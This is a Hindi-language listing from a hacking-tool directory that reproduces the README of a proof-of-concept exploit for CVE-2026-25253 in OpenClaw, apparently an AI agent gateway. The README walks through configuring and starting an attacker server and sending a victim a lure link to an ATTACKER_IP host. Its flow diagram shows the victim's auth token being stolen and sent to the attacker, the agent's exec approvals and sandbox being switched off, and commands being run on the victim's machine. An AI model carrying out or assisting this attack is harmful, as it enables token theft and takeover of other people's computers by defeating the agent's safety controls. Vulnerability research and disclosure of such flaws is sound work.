Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-25253-research — CVE-2026-25253 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो क्रॉस-साइट वेबसॉकेट हाईजैकिंग के माध्यम से OpenClaw पर वन-क्लिक RCE प्रदर्शित करता है। इसमें टोकन चुराने और कमांड निष्पादित करने के लिए अटैकर सर्वर और ब्राउज़र-आधारित पेलोड शामिल है। | Kitploit
उपकरण/GitHubGitHub/al4n4n/cve-2026-25253-research
टोहीशोषणवेब एप्लिकेशन शोषणवेब सुरक्षारेड टीमिंगपेलोड डेवलपमेंट
GitHubal4n4n/cve-2026-25253-research

CVE-2026-25253-research

CVE-2026-25253 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो क्रॉस-साइट वेबसॉकेट हाईजैकिंग के माध्यम से OpenClaw पर वन-क्लिक RCE प्रदर्शित करता है। इसमें टोकन चुराने और कमांड निष्पादित करने के लिए अटैकर सर्वर और ब्राउज़र-आधारित पेलोड शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
716 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-25253 प्रूफ ऑफ कॉन्सेप्ट

क्रॉस-साइट वेबसॉकेट हाईजैकिंग के माध्यम से OpenClaw पर वन-क्लिक RCE।

अस्वीकरण: यह कोड केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। स्पष्ट लिखित अनुमति के बिना सिस्टम के विरुद्ध इस कोड का उपयोग अवैध और अनैतिक है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।

ब्लॉग

इस भेद्यता के सोर्स-कोड-स्तरीय विश्लेषण और यह PoC कैसे बनाया गया, इसके लिए विस्तृत विश्लेषण पढ़ें।

पूर्वापेक्षाएँ

  • Node.js (v18 या बाद का संस्करण)
  • पीड़ित मशीन पर गेटवे के साथ एक चालू OpenClaw इंस्टेंस (डिफ़ॉल्ट: localhost:18789)
  • पीड़ित के ब्राउज़र में एक सक्रिय ऑथ टोकन संग्रहीत होना चाहिए (अर्थात, उन्होंने पहले कंट्रोल UI का उपयोग किया हो)

Node.js इंस्टॉल करें

macOS (Homebrew):

root@kitploit:~
brew install node

Ubuntu / Debian:

root@kitploit:~
curl -fsSL https://deb.nodesource.com/setup_22.x | sudo -E bash -
sudo apt-get install -y nodejs

Windows:

https://nodejs.org/ से इंस्टॉलर डाउनलोड करें और निर्देशों का पालन करें।

इंस्टॉलेशन सत्यापित करें:

root@kitploit:~
node -v
npm -v

सेटअप

root@kitploit:~
git clone https://github.com/al4n4n/CVE-2026-25253-research.git
cd CVE-2026-25253-research
npm install

यह केवल एक निर्भरता इंस्टॉल करता है: ws (वेबसॉकेट लाइब्रेरी)।

कॉन्फ़िगरेशन

अपने वातावरण से मेल खाने के लिए exploit.html के शीर्ष को संपादित करें:

root@kitploit:~
const LOCAL_SCHEME = 'http';                // पीड़ित के कंट्रोल UI का स्कीम
const GATEWAY_URL = 'ws://127.0.0.1:18789'; // पीड़ित का लोकल गेटवे
const ATTACKER_WS_PORT = 8080;              // हमलावर WS पोर्ट (attacker-server.js से मेल खाना चाहिए)
const ATTACKER_SCHEME = 'ws';               // TLS के पीछे होने पर 'wss' उपयोग करें
const COMMAND = 'touch /tmp/success';       // पीड़ित होस्ट पर निष्पादित करने के लिए कमांड

यदि आपको अलग पोर्ट चाहिए तो attacker-server.js के शीर्ष को संपादित करें:

root@kitploit:~
const HTTP_PORT = 3000;  // exploit.html परोसता है
const WS_PORT = 8080;    // चुराए गए टोकन कैप्चर करता है

चलाना

1. हमलावर सर्वर शुरू करें

root@kitploit:~
node attacker-server.js

आपको यह देखना चाहिए:

root@kitploit:~
============================================================
CVE-2026-25253 Attack Server
============================================================

[HTTP]  Exploit page: http://0.0.0.0:3000/exploit.html
[WS]    Token capture: ws://0.0.0.0:8080

Waiting for victim...

2. पीड़ित को लुभाएं

पीड़ित को निम्नलिखित URL भेजें (<ATTACKER_IP> को अपने IP से बदलें):

root@kitploit:~
http://<ATTACKER_IP>:3000/exploit.html

पीड़ित को इस लिंक को उस ब्राउज़र में खोलना चाहिए जहां उन्होंने पहले OpenClaw कंट्रोल UI का उपयोग किया है (ताकि ऑथ टोकन localStorage में मौजूद हो)।

3. क्या होता है

root@kitploit:~
┌──────────────────────────────────────────────────────────────────────────┐
│                          EXPLOIT FLOW                                    │
├──────────────────────────────────────────────────────────────────────────┤
│                                                                          │
│  1. Victim visits http://<attacker>:3000/exploit.html                    │
│     │                                                                    │
│  2. Page opens popup: http://127.0.0.1:18789?gatewayUrl=ws://<attacker>  │
│     │                                                                    │
│  3. Control UI in popup reads token from localStorage                    │
│     and sends it to attacker's WS server via gatewayUrl                  │
│     │                                                                    │
│  4. Attacker server rejects first connect (device token)                 │
│     Control UI retries with settings token → CAPTURED                    │
│     │                                                                    │
│  5. exploit.html opens its OWN WebSocket to ws://127.0.0.1:18789         │
│     (Cross-Site WebSocket Hijacking - no Origin validation)              │
│     │                                                                    │
│  6. Authenticates with stolen token, disables security:                  │
│     • exec.approvals.set → ask: "off"                                    │
│     • config.patch → host: "gateway", sandbox.mode: "off"                │
│     │                                                                    │
│  7. Sends agent command → RCE on victim host                             │
│                                                                          │
└──────────────────────────────────────────────────────────────────────────┘

4. सत्यापित करें

पीड़ित मशीन पर, जांचें कि कमांड निष्पादित हुई या नहीं:

root@kitploit:~
ls -la /tmp/success

फ़ाइलें

फ़ाइलविवरण
attacker-server.jsHTTP सर्वर (एक्सप्लॉइट पेज परोसता है) + वेबसॉकेट सर्वर (चुराए गए टोकन कैप्चर करता है)
exploit.htmlब्राउज़र-आधारित एक्सप्लॉइट पेलोड जो टोकन चुराता है, वेबसॉकेट को हाईजैक करता है, सुरक्षा अक्षम करता है, और कमांड निष्पादित करता है
टूल डाउनलोड करें
package.jsonNode.js निर्भरताएँ (ws)